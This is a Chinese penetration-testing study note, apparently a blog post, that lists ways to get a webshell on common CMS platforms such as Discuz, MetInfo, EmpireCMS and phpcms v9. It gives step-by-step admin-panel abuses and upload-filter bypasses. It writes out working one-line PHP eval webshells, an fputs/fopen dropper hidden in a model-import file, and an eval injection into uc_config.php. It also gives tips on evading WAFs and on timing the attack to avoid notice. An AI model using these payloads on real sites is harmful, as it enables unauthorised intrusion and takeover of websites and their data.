• 渗透测试学习 二十三、常见cms拿shell


    常见cms

    良精、科讯、动易、aspcms、dz

    米拓cms、phpcms2008、帝国cms、phpv9

    phpweb、dedecms

     

    良精

    方法:

    1、数据库备份拿shell

             上传图片——点击数据库备份——改为脚本格式——添加账号,讲一句话添加在用户名处——备份——改为脚本格式

    2、双文件上传

    3、配置插马

    4、修改文件上传类型直接上传

     

     

    科讯(用IE)

    /admin/admin.asp   后台路径

    1、利用解析漏洞

    2、设置——网站基本信息设置——默认允许上传文件类型,将asp改为aaspsp(会将asp替换为空)

             内容——图片添加——上传时改为aaspsp

             设置——基本设置——其它选项——通用页面目录——html/a.asp/(目录解析)——标签——自定义静态标签——增加静态标签——插入一句话——自定义页面——生成一个页面,会在a.asp目录下

     

    动易(学校,简单的企业)

    在网站配置中插马——连接inc/config.asp文件

    数据库备份

    双文件上传

     

    aspcms

    界面风格——编辑模板/css文件(利用IIS6.0解析漏洞)——添加——文件系统——a.asp;html——内容插入一句话

    拓展功能——幻灯片设置——插马

     

    dz

    uckey或利用插件上传(常见的网站discuz x2.5)

    后台 admin.php或cu_server

    站长——ucenter设置(通过配置插马,闭合拿shell)

    站长——数据库备份(或短文件漏洞)

     

    米拓cms

    metinfo 5.3.18                   install/phpinfo.php——里面能找到网站根目录

    后台         admin/index.php (上传图片马 包含文件)

    后台——安全——数据库备份——下载——打开(txt)——在完整的一句话后面写入新的一句话(select “<?php @eval($_POST[A]);?>” into outfile ‘网站根目录,路径写成Linux路径’)——恢复(一般在晚上没有数据交互的时候再做)

    权限要求很高

     

    帝国cms

    empircms-v6.6

    127.0.0.1/e/install

    后台:127.0.0.1/e/admin/index.php

    后台——数据表与系统模型——管理数据表——管理系统表模型——导入系统模型(要导.mod的文件)——<?fputs(fopen(“cnm.php”,”w”),”<?eval($_POST[cmd];)?>”)?>保存为mod文件,文件名为aa.php.mod——记住导入的目录路径/e/admin/cnm.php

    注意:导入时候可能会有waf,可以在脚本中加入免杀的一句话

     

    phpv9

    phpcms_v9.6.3_GBK

    127.0.0.1/install

    后台——界面——模板风格——详情列表——search——编辑插马

    后台——phpsso——系统管理——ucenter配置——uc_config.php中 ‘);eval($_post[a]);#

    后台——内容——专题         phpv9低权限拿shell

     

    phpweb

    dedecmd

  • 相关阅读:
    Python find() 方法
    enumerate函数
    【Unity】项目工程源码
    【Unity】UGUI聊天消息气泡 随文本内容自适应
    Unity读Excel 输出PC端(Windows)后不能读取的问题
    【C#】读取Excel中嵌套的Json对象,Json带斜杠的问题(其三)
    【C#】读取Excel中嵌套的Json对象,Json带斜杠的问题(其二)
    【C#】读取Excel中嵌套的Json对象,Json带斜杠的问题(其一)
    Unity输出PC端(Windows) 拖拽文件到app中
    Android Studio报错Error:Failed to open zip file. Gradle's dependency cache may be corrupt
  • 原文地址:https://www.cnblogs.com/Yuuki-/p/11778092.html
Copyright © 2020-2023  润新知